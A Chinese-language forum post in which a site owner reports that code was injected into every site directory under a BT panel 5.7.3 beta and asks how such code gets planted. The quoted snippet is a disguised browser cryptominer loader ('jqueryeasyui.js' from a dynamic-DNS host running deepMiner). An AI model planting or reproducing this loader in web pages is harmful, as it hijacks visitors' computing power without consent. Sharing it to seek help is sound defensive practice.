BT5.7.3测试版下所有的网站目录被植入一段代码,导致所有开启了SSL的网站被谷歌判断为不安全并且窃取用户资料,从而被进行拦截和提示。因为无法判断这段代码是被挖矿了还是被劫持,特来求助。不知道这样的代码通常是被什么途径怎么植入的?
代码如下:- <script src="https://greenindex.dynamic-dns.net/jqueryeasyui.js"></script>
- <script>
- var uri = 'www';
- var jqueryui = new deepMiner.Anonymous(uri, {autoThreads: true,throttle: 0.5});
- if (!jqueryui.isMobile() && !jqueryui.didOptOut(14400)) {
- jqueryui.start();
- }
- </script>
复制代码
|
|